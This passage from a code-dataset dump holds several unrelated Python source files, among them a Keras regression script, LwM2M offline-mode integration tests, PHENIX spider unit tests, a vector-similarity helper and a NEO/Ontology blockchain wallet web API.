batch_size = 1, validation_data=(x_val,y_val)) # 훈련 + xy_val를 이용해서 검증 \n\n# 평가 예측\nloss, acc = model.evaluate(x_test, y_test,batch_size = 1) \nprint('acc:',acc)\n\ny_predict = model.predict(x_test)\nprint(y_predict)\n\n# RMSE 구하기\nfrom sklearn.metrics import mean_squared_error\ndef RMSE(y_test, y_predict):\n return np.sqrt(mean_squared_error(y_test, y_predict)) # 두 결과값의 차이만큼 뺸다.\nprint('RMSE:', RMSE(y_test, y_predict)) # 0.001 이하\n# R2\nfrom sklearn.metrics import r2_score\nr2_y_predict = r2_score(y_test, y_predict)\nprint('R2:', r2_y_predict) # 높을 수록 좋음.","sub_path":"keras01/keras11_mip.py","file_name":"keras11_mip.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"382480409","text":"import sys\n\n\nlastIndex = -1\ni = 0\nfor letter in sys.argv[1]:\n\n index = sys.argv[1].find(sys.argv[2],i)\n\n if index != lastIndex and index != -1:\n lastIndex = index\n print(index+1)\n\n i += 1\n","sub_path":"SUBS/subs.py","file_name":"subs.py","file_ext":"py","file_size_in_byte":197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"409010828","text":"# -*- coding: utf-8 -*-\n#\n# Copyright 2017-2018 AVSystem \n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport socket\n\nfrom framework.lwm2m_test import *\n\nOFFLINE_INTERVAL = 4\n\n\nclass OfflineWithDtlsResumeTest(test_suite.Lwm2mDtlsSingleServerTest):\n def runTest(self):\n # Create object\n req = Lwm2mCreate('/1337', TLV.make_instance(instance_id=0).serialize())\n self.serv.send(req)\n self.assertMsgEqual(Lwm2mCreated.matching(req)(), self.serv.recv())\n\n # Force Update so that we won't have differing data models during exit-offline\n self.communicate('send-update')\n self.assertDemoUpdatesRegistration(content=ANY)\n\n # Observe: Timestamp\n observe_req = Lwm2mObserve('/1337/0/0')\n self.serv.send(observe_req)\n\n timestamp_pkt = self.serv.recv()\n self.assertMsgEqual(Lwm2mContent.matching(observe_req)(), timestamp_pkt)\n\n # now enter offline mode\n self.communicate('enter-offline')\n\n # if we were not fast enough, one more message might have come;\n # we try to support both cases\n try:\n timestamp_pkt = self.serv.recv(timeout_s=1)\n except socket.timeout:\n pass\n\n # now no messages shall arrive\n with self.assertRaises(socket.timeout):\n self.serv.recv(timeout_s=OFFLINE_INTERVAL)\n\n # exit offline mode\n self.communicate('exit-offline')\n\n # client reconnects with DTLS session resumption\n self.assertDtlsReconnect()\n\n notifications = 0\n while True:\n try:\n timestamp_pkt = self.serv.recv(timeout_s=0.2)\n self.assertEqual(timestamp_pkt.token, observe_req.token)\n notifications += 1\n except socket.timeout:\n break\n self.assertGreaterEqual(notifications, OFFLINE_INTERVAL - 1)\n self.assertLessEqual(notifications, OFFLINE_INTERVAL + 1)\n\n # Cancel Observe\n req = Lwm2mObserve('/1337/0/0', observe=1)\n self.serv.send(req)\n timestamp_pkt = self.serv.recv()\n self.assertMsgEqual(Lwm2mContent.matching(req)(), timestamp_pkt)\n\n # now no messages shall arrive\n with self.assertRaises(socket.timeout):\n self.serv.recv(timeout_s=2)\n\n\nclass OfflineWithReregisterTest(test_suite.Lwm2mDtlsSingleServerTest):\n LIFETIME = OFFLINE_INTERVAL - 1\n\n def setUp(self):\n super().setUp(lifetime=OfflineWithReregisterTest.LIFETIME)\n\n def runTest(self):\n self.communicate('enter-offline')\n\n # now no messages shall arrive\n with self.assertRaises(socket.timeout):\n self.serv.recv(timeout_s=OFFLINE_INTERVAL)\n\n self.communicate('exit-offline')\n\n # Register shall now come\n self.assertDtlsReconnect()\n self.assertDemoRegisters(lifetime=OfflineWithReregisterTest.LIFETIME)\n\n\nclass OfflineWithSecurityObjectChange(test_suite.Lwm2mDtlsSingleServerTest):\n def runTest(self):\n self.communicate('enter-offline')\n # Notify anjay that Security Object Resource changed\n self.communicate('notify /0/0/0')\n # This should not reload sockets\n with self.assertRaises(socket.timeout):\n self.serv.recv(timeout_s=1)\n\n # Notify anjay that Security Object Instances changed\n self.communicate('notify /0')\n with self.assertRaises(socket.timeout):\n self.serv.recv(timeout_s=1)\n\n self.communicate('exit-offline')\n self.assertDtlsReconnect()\n\n\nclass OfflineWithReconnect(test_suite.Lwm2mDtlsSingleServerTest):\n def runTest(self):\n self.communicate('enter-offline')\n with self.assertRaises(socket.timeout):\n self.serv.recv(timeout_s=OFFLINE_INTERVAL)\n self.communicate('reconnect')\n self.assertDtlsReconnect()\n\n\nclass OfflineWithoutDtlsTest(test_suite.Lwm2mSingleServerTest):\n def runTest(self):\n self.communicate('enter-offline')\n with self.assertRaises(socket.timeout):\n self.serv.recv(timeout_s=OFFLINE_INTERVAL)\n self.communicate('exit-offline')\n self.assertDemoRegisters()\n\n\nclass OfflineWithRegistrationUpdateSchedule(test_suite.Lwm2mDtlsSingleServerTest):\n def runTest(self):\n self.communicate('enter-offline')\n self.communicate('send-update 0')\n with self.assertRaises(socket.timeout):\n pkt = self.serv.recv(timeout_s=1)\n\n self.communicate('exit-offline')\n self.assertDtlsReconnect()\n # no Update because it doesn't work while in offline mode\n","sub_path":"test/integration/suites/default/offline.py","file_name":"offline.py","file_ext":"py","file_size_in_byte":5097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"224055478","text":"# -*- coding: utf-8 -*-\n#\n# This file is part of hepcrawl.\n# Copyright (C) 2015, 2016, 2017 CERN.\n#\n# hepcrawl is a free software; you can redistribute it and/or modify it\n# under the terms of the Revised BSD License; see LICENSE file for\n# more details.\n\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\nimport pytest\n\nfrom scrapy.selector import Selector\n\nfrom hepcrawl.spiders import phenix_spider\n\nfrom hepcrawl.testlib.fixtures import (\n fake_response_from_file,\n fake_response_from_string,\n get_node,\n )\n\n\n@pytest.fixture\ndef record():\n \"\"\"Return results generator from the Alpha spider.\"\"\"\n spider = phenix_spider.PhenixSpider()\n response = fake_response_from_file('phenix/test_1.html')\n selector = Selector(response, type='html')\n nodes = selector.xpath('//%s' % spider.itertag)\n\n parsed_item = spider.parse_node(response, nodes[0])\n assert parsed_item\n assert parsed_item.record\n\n return parsed_item.record\n\n\n@pytest.fixture\ndef non_thesis():\n \"\"\"Return a heprecord for a Master's thesis (should be None as we don't\n want them).\"\"\"\n spider = phenix_spider.PhenixSpider()\n body = \"\"\"\n
    \n
  • M.Sc. Author:\n \"This is an Master's thesis, not a PhD\",   M.Sc. thesis at Master Science University, 2016, \n

    \n
\n \"\"\"\n response = fake_response_from_string(body)\n node = get_node(spider, '//li', text=body)\n return spider.parse_node(response, node)\n\n\ndef test_non_thesis(non_thesis):\n \"\"\"Test MSc thesis skipping.\"\"\"\n assert non_thesis is None\n\n\ndef test_title(record):\n \"\"\"Test extracting title.\"\"\"\n title = \"MEASUREMENT OF THE DOUBLE HELICITY ASYMMETRY IN INCLUSIVE $\\pi^{0}$ PRODUCTION IN POLARIZED PROTON-PROTON COLLISIONS AT $\\sqrt{s}$ = 510 GeV\"\n assert 'title' in record\n assert record['title'] == title\n\n\ndef test_date_published(record):\n \"\"\"Test extracting date_published.\"\"\"\n date_published = \"2015\"\n assert 'date_published' in record\n assert record['date_published'] == date_published\n\n\ndef test_authors(record):\n \"\"\"Test authors.\"\"\"\n authors = [\"Guragain, Hari\"]\n affiliation = \"Georgia State University\"\n\n assert 'authors' in record\n assert len(record['authors']) == len(authors)\n\n # here we are making sure order is kept\n for index, name in enumerate(authors):\n assert record['authors'][index]['full_name'] == name\n assert affiliation in [\n aff['value'] for aff in record['authors'][index]['affiliations']\n ]\n\n\ndef test_pdf_link(record):\n \"\"\"Test pdf link(s)\"\"\"\n files = \"http://www.phenix.bnl.gov/phenix/WWW/talk/archive/theses/2015/Guragain_Hari-DISSERTATION.pdf\"\n assert 'additional_files' in record\n assert record['additional_files'][0]['url'] == files\n","sub_path":"tests/unit/test_phenix.py","file_name":"test_phenix.py","file_ext":"py","file_size_in_byte":2810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"218945058","text":"\ndef is_id_correct(id_no, buys, boxs):\n left = boxs\n ret_item = (False,-1,-1)\n for i in range(id_no,n_houses):\n left = left - buys[i]\n if left < 0:\n pass\n #print(id_no+1,i+1,\" Not Okay \",left)\n if left == 0:\n #print(id_no+1,i+1,\" OKAY \",left)\n\n ret_item = (True,id_no+1,i+1)\n return ret_item\ndef search_all_possibilities(n_houses,n_boxes,n_buys):\n for i in range(n_houses):\n deal = is_id_correct(i, buys=n_buys, boxs=n_boxes)\n if deal[0] is True:\n print(f\"\\nStart your route at house {deal[1]} and go to house {deal[2]} to delivery {n_boxes} boxes of girl scout cookies.\\n\")\n break\n if deal[0] is False:\n print(\"It is impossible to derivel any cookies without making a partial order.\")\n\nif __name__=='__main__':\n \"\"\"\n Data Should be loaded into file named datafile.txt as coded.\n \"\"\"\n with open('datafile.txt','r') as file:\n data = file.read().split('\\n')\n if data[-1]=='': data=data[:-1]\n data = [int(i) for i in data]\n\n n_houses = data[0]\n n_boxes = data[1]\n n_buys = data[2:]\n if len(n_buys) is not n_houses:\n print(\"Data has errors, Please check\")\n exit()\n\n # Testing\n # n_houses = 9\n # n_boxes = 12\n # n_buys = [4,4,4,3,3,3,5,4,4]\n search_all_possibilities(n_houses,n_boxes,n_buys)\n","sub_path":"routesearch.py","file_name":"routesearch.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"454367543","text":"import pandas as pd\nimport numpy as np\nimport dask.array as da\ndef normalize(v, axis=-1, order=2):\n l2 = np.linalg.norm(v, ord = order, axis=axis, keepdims=True)\n l2[l2==0] = 1\n return v/l2\n\nclass VectorProcessor:\n\n def __init__(self):\n self.vector = []\n self.indexes = []\n self.da_array = da.array([])\n self.concrete_array = []\n self.word_table = []\n\n def read_csv(self, path):\n self.df = pd.read_csv(path)\n\n def set_vector(self, vectors):\n self.vector = vectors\n\n def set_da_array(self, array):\n self.da_array = array\n\n def set_concrete_array(self, array):\n self.concrete_array = array\n\n def set_word_indexes(self, indexes):\n self.indexes = indexes\n\n def cos_sim_da(self, v1, v2):\n v2 = da.reshape(v2, (v2.shape[1], 1))\n result = da.dot(v1, v2) / (da.linalg.norm(v1) * da.linalg.norm(v2))\n print('computing cos similar...')\n return result.compute()[0][0]\n\n def cos_sim_arr(self, v1, v2):\n print(v1, v2)\n v1 = np.array(v1)\n v2 = np.array(v2)\n # v1[v1<10]=0\n # v2[v2<10]=0\n # index = 0\n # for i, v in enumerate(v1):\n # index = i\n # if v2[i] != v:\n # break\n \n # v1 = np.delete(v1, [0, index], 0)\n # v2 = np.delete(v2, [0, index], 0)\n # v1 = self.__extract_nonzero_array(v1)\n # v2 = self.__extract_nonzero_array(v2)\n \n # for i, v in enumerate(v1):\n # print(v, v2)\n \n v2 = np.reshape(v2, (v2.shape[0], 1))\n result = np.dot(v1, v2) / (np.linalg.norm(v1) * np.linalg.norm(v2))\n return result\n\n def __extract_nonzero_array(self, v):\n return v[v.nonzero()]\n\n def calc_sim_da(self, word_1, word_2):\n word_1_index = 0\n word_2_index = 0\n try:\n word_1_index = self.indexes.index(word_1)\n word_2_index = self.indexes.index(word_2)\n sim = self.cos_sim_da(\n da.take(self.da_array, [word_1_index]), \n da.take(self.da_array, [word_2_index])\n )\n print(sim)\n except KeyError:\n print(\"not found word\")\n \n def calc_sim_arr(self, word_1, word_2):\n word_1_index = 0\n word_2_index = 0\n try:\n word_1_index = self.indexes.index(word_1)\n word_2_index = self.indexes.index(word_2)\n sim = self.cos_sim_arr(\n self.word_table[word_1_index],\n self.word_table[word_2_index]\n )\n print(float(sim[0]))\n except KeyError:\n print(\"not found word\") ","sub_path":"vector_processor/vector.py","file_name":"vector.py","file_ext":"py","file_size_in_byte":2690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"512065390","text":"import os\nimport json\nimport asyncio\nfrom coreweb import get, post, options\nfrom aiohttp import web\nfrom decimal import Decimal as D\nfrom pymongo import DESCENDING\nfrom binascii import hexlify, unhexlify\nfrom apis import APIValueError, APIResourceNotFoundError, APIError\nfrom tools import Tool, check_decimal, sci_to_str, big_or_little\nfrom assets import NEO, GAS, GLOBAL_TYPES\nimport logging\nlogging.basicConfig(level=logging.DEBUG)\nfrom dotenv import load_dotenv, find_dotenv\nload_dotenv(find_dotenv(), override=True)\nfrom ont_handlers import height_ont, block_ont, transaction_ont, get_ont_balance, address_ont, claim_ont, transfer_ont, ong, broadcast_ont, transfer_ont_options, ong_options, broadcast_ont_options\nfrom ont_handlers import assets as ONT_ASSETS\n\n\ndef valid_net(net, request):\n return net == request.app['net']\n\ndef valid_platform(platform):\n return platform in ['ios','android']\n\ndef valid_asset(asset):\n if len(asset) in [40,64]: return True\n return False\n\ndef valid_page_arg(index, length):\n try:\n index = int(index)\n except:\n return False, {'error':'wrong index'}\n try:\n length = int(length)\n except:\n return False, {'error':'wrong length'}\n if index <= 0: return False, {'error':'wrong index'}\n if length <= 0 or length>100: return False, {'error':'wrong length'}\n return True, {'index':index, 'length':length}\n\ndef get_asset_decimal(asset):\n if asset['type'] in GLOBAL_TYPES: return asset[\"precision\"]\n try:\n return int(asset['decimals'])\n except:\n return 8\n\nasync def get_rpc(request,method,params):\n async with request.app['session'].post(request.app['neo_uri'],\n json={'jsonrpc':'2.0','method':method,'params':params,'id':1}) as resp:\n if 200 != resp.status:\n logging.error('Unable to visit %s %s' % (request.app['neo_uri'], method))\n return '404'\n j = await resp.json()\n if 'error' in j.keys():\n logging.error('result error when %s %s' % (request.app['neo_uri'], method))\n return '404'\n return j['result']\n\nasync def send_raw_transaction(tx, request):\n async with request.app['session'].post(request.app['neo_uri'],\n json={'jsonrpc':'2.0','method':'sendrawtransaction','params':[tx],'id':1}) as resp:\n method = 'sendrawtransaction'\n if 200 != resp.status:\n logging.error('Unable to visit %s %s' % (request.app['neo_uri'], method))\n return False,'404'\n j = await resp.json()\n if 'error' in j.keys():\n logging.error('result error when %s %s' % (request.app['neo_uri'], method))\n return False, j['error']['message']\n return j['result'],''\n\nasync def get_nep5_asset_balance(request, address, asset, decimals=8):\n result = await get_rpc(request, 'invokefunction',\n [asset, \"balanceOf\", [{\"type\":\"Hash160\",\"value\":big_or_little(Tool.address_to_scripthash(address))}]])\n if result and \"HALT, BREAK\" == result[\"state\"]:\n hex_str = result['stack'][0]['value']\n if hex_str: return Tool.hex_to_num_str(hex_str, decimals)\n return '0'\n return '0'\n\nasync def get_multi_nep5_balance(request, address, assets):\n result = {}\n for asset in assets:\n try:\n asset['decimals'] = int(asset['decimals'])\n except:\n asset['decimals'] = 8\n nep5_result = await asyncio.gather(\n *[get_nep5_asset_balance(request, address, asset[\"id\"], asset['decimals']) for asset in assets])\n for i in range(len(assets)):\n result[assets[i]['id']] = nep5_result[i]\n return result\n\nasync def get_utxo(request, address, asset):\n if not asset.startswith('0x'): asset = '0x' + asset\n result = []\n cursor = request.app['db'].utxos.find({'address':address, 'asset':asset, 'spent_height':None})\n for doc in await cursor.to_list(None):\n doc['asset'] = doc['asset'][2:]\n doc['txid'] = doc['txid'][2:]\n result.append({'prevIndex':doc['index'],'prevHash':doc['txid'],'value':doc['value']})\n return result\n\nasync def get_global_asset_balance(request, address, asset):\n if not asset.startswith('0x'): asset = '0x' + asset\n utxo = await get_utxo(request, address, asset)\n return sci_to_str(str(sum([D(i['value']) for i in utxo])))\n\nasync def get_all_utxo(request, address):\n result = {}\n cursor = request.app['db'].utxos.find({'address':address,'spent_height':None})\n for doc in await cursor.to_list(None):\n asset = doc['asset'] = doc['asset'][2:]\n doc['txid'] = doc['txid'][2:]\n if asset not in result.keys():\n result[asset] = []\n result[asset].append({'prevIndex':doc['index'],'prevHash':doc['txid'],'value':doc['value']})\n return result\n\nasync def get_asset_state(request):\n result = await request.app['db'].state.find_one({'_id':'asset'})\n if not result: return -1\n return result['value']\n\nasync def get_all_global(request):\n result = []\n cursor = request.app['db'].assets.find({\"type\":{\"$in\":GLOBAL_TYPES}})\n for doc in await cursor.to_list(None):\n doc['id'] = doc['_id']\n del doc['_id']\n result.append(doc)\n return result\n\nasync def get_all_nep5(request):\n result = []\n cursor = request.app['db'].assets.find({'type':'NEP5'})\n for doc in await cursor.to_list(None):\n doc['id'] = doc['_id']\n del doc['_id']\n result.append(doc)\n result.sort(key=lambda k:(k.get('symbol','zzz')))\n return result\n\nasync def get_all_ontology(request):\n result = []\n cursor = request.app['db'].assets.find({'type':'ONTOLOGY'})\n for doc in await cursor.to_list(None):\n doc['id'] = doc['_id']\n del doc['_id']\n result.append(doc)\n return result\n\nasync def get_all_asset(request):\n results = await asyncio.gather(\n get_asset_state(request),\n get_all_global(request),\n get_all_nep5(request),\n get_all_ontology(request))\n return {'state':results[0], 'GLOBAL':results[1], 'NEP5':results[2], 'ONTOLOGY':results[3]}\n\nasync def get_an_asset(id, request):\n return await request.app['db'].assets.find_one({'_id':id}) \n\n@get('/')\ndef index(request):\n return {'hello':'%s' % request.app['net'],\n 'GET':[\n '/',\n '/{net}/height',\n '/{net}/height/ont',\n '/{net}/block/{block}',\n '/{net}/block/ont/{block}',\n '/{net}/transaction/{txid}',\n '/{net}/transaction/ont/{txid}',\n '/{net}/claim/{address}',\n '/{net}/claim/ont/{address}',\n '/{net}/address/{address}',\n '/{net}/address/ont/{address}',\n '/{net}/asset?id={assetid}',\n '/{net}/history/{address}?asset={assetid}&index={index}&length={length}',\n ],\n 'POST':[\n '/{net}/gas',\n '/{net}/ong',\n '/{net}/transfer',\n '/{net}/transfer/ont',\n '/{net}/broadcast',\n '/{net}/broadcast/ont',\n ],\n 'ref':{\n 'How to transfer?':'http://note.youdao.com/noteshare?id=b60cc93fa8e8804394ade199c52d6274',\n 'How to claim GAS?':'http://note.youdao.com/noteshare?id=c2b09b4fa26d59898a0f968ccd1652a0',\n 'How to claim ONG?':'http://note.youdao.com/noteshare?id=96992980cb8b5c6210a5b79478b3111d',\n 'Source Code':'https://github.com/OTCGO/SYNC_NEO/',\n },\n }\n\n@get('/{net}/height')\nasync def height(net, request):\n if not valid_net(net, request): return {'error':'wrong net'}\n return {'height':await request.app['redis'].get('height')}\n\n@get('/{net}/asset')\nasync def asset(net, request, *, id=0):\n if not valid_net(net, request): return {'error':'wrong net'}\n if 0 == id:\n return await get_all_asset(request)\n if id.startswith('0x'): id = id[2:]\n if not valid_asset(id): return {'error':'asset not exist'}\n r = await get_an_asset(id, request)\n if r: \n r['id'] = r['_id']\n del r['_id']\n return r\n return {'error':'asset not exist'}\n\n@get('/{net}/block/{block}')\nasync def block(net, block, request):\n if not valid_net(net, request): return {'error':'wrong net'}\n try:\n b = int(block)\n except:\n return {'error':'wrong arg: {}'.format(block)}\n r = await request.app['db'].state.find_one({'_id':'height'})\n h = r['value']\n if b < 0 or b > h: return {'error':'not found'}\n r = await request.app['db'].blocks.find_one({'_id':b})\n r['index'] = r['_id']\n del r['_id']\n return r\n\n@get('/{net}/transaction/{txid}')\nasync def transaction(net, txid, request):\n if not valid_net(net, request): return {'error':'wrong net'}\n return await get_rpc(request, 'getrawtransaction', [txid,1])\n\n@get('/{net}/address/{address}')\nasync def address(net, address, request):\n if not valid_net(net, request): return {'error':'wrong net'}\n if not Tool.validate_address(address): return {'error':'wrong address'}\n result = {'_id':address,'balances':{}}\n nep5 = await get_all_nep5(request)\n aresult = await asyncio.gather(\n get_all_utxo(request,address),\n get_multi_nep5_balance(request, address, nep5),\n get_ont_balance(request, address))\n result['utxo'] = aresult[0]\n for k,v in result['utxo'].items():\n result['balances'][k] = sci_to_str(str(sum([D(i['value']) for i in v])))\n else:\n if NEO[2:] not in result['balances'].keys(): result['balances'][NEO[2:]] = \"0\"\n if GAS[2:] not in result['balances'].keys(): result['balances'][GAS[2:]] = \"0\"\n result['balances'].update(aresult[1])\n result['balances'][ONT_ASSETS['ont']['scripthash']] = aresult[2]['ont']\n result['balances'][ONT_ASSETS['ong']['scripthash']] = aresult[2]['ong']\n return result\n\n@get('/{net}/claim/{address}')\nasync def claim(net, address, request):\n if not valid_net(net, request): return {'error':'wrong net'}\n if not Tool.validate_address(address): return {'error':'wrong address'}\n raw_utxo = []\n cursor = request.app['db'].utxos.find({'address':address,'asset':NEO, 'claim_height':None})\n for document in await cursor.to_list(None):\n raw_utxo.append(document)\n r = await request.app['db'].state.find_one({'_id':'height'})\n height = r['value'] + 1\n return await Tool.compute_gas(height, raw_utxo, request.app['db'])\n\n@get('/{net}/history/{address}')\nasync def history(net, address, request, *, asset=0, index=1, length=20):\n if not valid_net(net, request): return {'error':'wrong net'}\n if not Tool.validate_address(address): return {'error':'wrong address'}\n result,info = valid_page_arg(index, length)\n if not result: return info\n index, length = info['index'], info['length']\n skip_num = (index - 1) * length\n raw_utxo = []\n query = {'address':address}\n if 0 != asset:\n if asset.startswith('0x'): asset = asset[2:]\n if not valid_asset(asset): return {'error':'asset not exist'}\n if 64 == len(asset):\n query['asset'] = '0x' + asset\n else:\n query['asset'] = asset\n if 'asset' in query.keys() and 40 == len(query['asset']):\n cursor = request.app['db'].nep5history.find(query).sort('time', DESCENDING)\n else:\n cursor = request.app['db'].history.find(query).sort('time', DESCENDING)\n for document in await cursor.skip(skip_num).to_list(length=length):\n del document['_id']\n del document['address']\n raw_utxo.append(document)\n return {'result':raw_utxo}\n\n@get('/{net}/version/{platform}')\nasync def version(net, platform, request):\n if not valid_net(net, request): return {'error':'wrong net'}\n platform = platform.lower()\n if not valid_platform(platform): return {'error':'wrong platform'}\n info = await request.app['db'].state.find_one({'_id':platform})\n if info:\n del info['_id']\n return {'result':True, 'version':info}\n return {'result':False, 'error':'not exist'}\n\n@post('/{net}/transfer')\nasync def transfer(net, request, *, source, dests, amounts, assetId, **kw):\n #params validation\n if not valid_net(net, request): return {'result':False, 'error':'wrong net'}\n if not Tool.validate_address(source): return {'result':False, 'error':'wrong source'}\n if assetId.startswith('0x'): assetId = assetId[2:]\n if not valid_asset(assetId): return {'result':False, 'error':'wrong assetId'}\n asset = await get_an_asset(assetId, request)\n if not asset: return {'result':False, 'error':'wrong assetId'}\n nep5_asset = global_asset = False\n if 40 == len(assetId): nep5_asset = True\n if 64 == len(assetId): global_asset = True\n ad = get_asset_decimal(asset)\n dests,amounts = dests.split(','), amounts.split(',')\n ld,la = len(dests), len(amounts)\n if ld != la: return {'result':False, 'error':'length of dests != length of amounts'}\n if nep5_asset and 1 != ld:\n return {'result':False, 'error':\"NEP5 token transfer only support One to One\"}\n if False in map(Tool.validate_address, dests): return {'error':'wrong dests'}\n try:\n amounts = [D(a) for a in amounts]\n except:\n return {'result':False, 'error':'wrong amounts'}\n if [a for a in amounts if a <= D(0)]: return {'error':'wrong amounts'}\n if False in [check_decimal(a,ad) for a in amounts]:\n return {'result':False, 'error':'wrong amounts'}\n #check balance && transaction\n tran_num = sum(amounts)\n if nep5_asset:\n balance = D(await get_nep5_asset_balance(request, source, assetId, ad))\n if balance < tran_num: return {'result':False, 'error':'insufficient balance'}\n transaction = Tool.transfer_nep5(assetId, source, dests[0], amounts[0], ad)\n result,msg = True,''\n if global_asset:\n utxo = await get_utxo(request, source, assetId)\n balance = sum([D(i['value']) for i in utxo])\n if balance < tran_num: return {'result':False, 'error':'insufficient balance'}\n items = [(dests[i],amounts[i]) for i in range(len(dests))]\n transaction,result,msg = Tool.transfer_global(source, utxo, items, assetId)\n if result:\n return {'result':True, 'transaction':transaction}\n return {'result':False, 'error':msg}\n\n@post('/{net}/gas')\nasync def gas(net, request, *, publicKey, **kw):\n #params validation\n if not valid_net(net, request): return {'result':False, 'error':'wrong net'}\n if not Tool.validate_cpubkey(publicKey): return {'result':False, 'error':'wrong publicKey'}\n #get gas\n address = Tool.cpubkey_to_address(publicKey)\n raw_utxo = []\n cursor = request.app['db'].utxos.find({'address':address,'asset':NEO, 'claim_height':None})\n for document in await cursor.to_list(None):\n raw_utxo.append(document)\n r = await request.app['db'].state.find_one({'_id':'height'})\n height = r['value'] + 1\n details = await Tool.compute_gas(height, raw_utxo, request.app['db'])\n tx,result,msg = Tool.claim_transaction(address, details)\n if result:\n return {'result':True, 'transaction':tx}\n return {'result':False, 'error':msg}\n\n@post('/{net}/new_contract')\nasync def new_contract(net, contract, address, request, **kw):\n if not valid_net(net, request): return {'result':False, 'error':'wrong net'}\n description = kw.get('description','')\n email = kw.get('email', '')\n author = kw.get('author', '')\n version = kw.get('version', '')\n name = kw.get('name', '')\n storage = kw.get('storage', '0')\n dynamic_invoke= kw.get('dynamic_invoke', '0')\n return_type = kw.get('return_type', 'void')\n parameter = kw.get('parameter', '')\n def str_to_hex_str(s):\n return hexlify(s.encode('utf8')).decode('utf8')\n tx = ''\n for k,v in {'description':description,\n 'email':email,\n 'author':author,\n 'version':version,\n 'name':name}.items():\n v = str_to_hex_str(v)\n if 0 == len(v):\n tx += '00'\n continue\n if len(v)/2>255: return {'result':False, 'error':'%s is too long' % k}\n tx += Tool.num_to_hex_str(len(v)//2) + v\n #use_storage && dynamic_invoke\n sys_fee = 0\n for k,v in {'storage':storage,\n 'dynamic_invoke':dynamic_invoke,\n }.items():\n if v not in ['0','1']: return {'result':False, 'error':'wrong %s,must 0 or 1' % k}\n else:\n if '0' == storage and '0' == dynamic_invoke:\n tx += '00'\n sys_fee = 90\n if '1' == storage and '0' == dynamic_invoke:\n tx += '51'\n sys_fee = 490\n if '0' == storage and '1' == dynamic_invoke:\n tx += '52'\n sys_fee = 590\n if '1' == storage and '1' == dynamic_invoke:\n tx += '53'\n sys_fee = 990\n #return_type\n return_dict = {\n 'signature':'00',\n 'boolean':'51',\n 'integer':'52',\n 'hash160':'53',\n 'hash256':'54',\n 'bytearray':'55',\n 'publickey':'56',\n 'string':'57',\n 'array':'60',\n 'interopinterface':'F0',\n 'void':'FF',\n }\n return_type = return_type.lower()\n if return_type not in return_dict.keys(): return {'result':False, 'error':'wrong return type, must 0 or 1'}\n tx += return_dict[return_type]\n #parameter\n parameter_dict = {\n 'signature':'00',\n 'boolean':'01',\n 'integer':'02',\n 'hash160':'03',\n 'hash256':'04',\n 'bytearray':'05',\n 'publickey':'06',\n 'string':'07',\n 'array':'10',\n 'interopinterface':'F0',\n 'void':'FF',\n }\n parameter = parameter.split(',')\n parameter = list(filter(lambda i:i != '', parameter))\n if not parameter:\n tx += '00'\n else:\n if False in map(lambda x:x in parameter_dict.keys(), parameter):\n return {'result':False, 'error':'wrong parameter'}\n tx += Tool.num_to_hex_str(len(parameter))\n for p in parameter:\n tx += parameter_dict[p]\n #contract\n contract_len = len(contract)\n if 0 == contract_len or 1 == contract_len%2: return {'result':False, 'error':'wrong length of the contract'}\n contract_len = contract_len // 2\n if contract_len <= 0xFF:\n tx += '4c' + Tool.num_to_hex_str(contract_len) + contract\n elif contract_len <= 0xFFFF:\n tx += '4d' + Tool.num_to_hex_str(contract_len, 2) + contract\n else:\n tx += '4e' + Tool.num_to_hex_str(contract_len, 4) + contract\n tx += '68134e656f2e436f6e74726163742e437265617465'\n #check balance\n if not Tool.validate_address(address): return {'result':False, 'error':'wrong address'}\n #InvocationTransaction\n return {'result':True, 'transaction':tx}\n\n@post('/{net}/broadcast')\nasync def broadcast(net, request, *, publicKey, signature, transaction):\n #params validation\n if not valid_net(net, request): return {'result':False, 'error':'wrong net'}\n if not Tool.validate_cpubkey(publicKey): return {'result':False, 'error':'wrong publicKey'}\n result,msg = Tool.verify(publicKey, signature, transaction)\n if not result: return {'result':False, 'error':msg}\n tx = Tool.get_transaction(publicKey, signature, transaction)\n txid = Tool.compute_txid(transaction)\n result,msg = await send_raw_transaction(tx, request)\n if result:\n return {'result':True, 'txid':txid}\n return {'result':False, 'error':msg}\n\n@options('/{net}/transfer')\nasync def transfer_options(net, request):\n if not valid_net(net, request): return {'result':False, 'error':'wrong net'}\n return 'OK'\n@options('/{net}/gas')\nasync def gas_options(net, request):\n if not valid_net(net, request): return {'result':False, 'error':'wrong net'}\n return 'OK'\n@options('/{net}/broadcast')\nasync def broadcast_options(net, request):\n if not valid_net(net, request): return {'result':False, 'error':'wrong net'}\n return 'OK'\n","sub_path":"www/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":20167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"650786486","text":"from xml.etree.ElementTree import tostring\nimport lxml.etree as ETree\n\nclass XMLParser:\n\n xmlParsar = None\n\n def getInstance():\n if XMLParser.xmlParsar == None:\n XMLParser.xmlParsar = XMLParser()\n\n return XMLParser.xmlParsar\n\n def writeAndPretify(self, root, filename):\n itemFile = open(filename, \"w\")\n itemFile.write(str(tostring(root).decode(\"utf-8\")))\n itemFile.close()\n\n fileContent = ETree.parse(filename)\n itemFile = open(filename, \"w\")\n itemFile.write(str(ETree.tostring(fileContent, pretty_print=True).decode(\"utf-8\")))\n itemFile.close()\n","sub_path":"SPUGServer/XMLParsar.py","file_name":"XMLParsar.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} 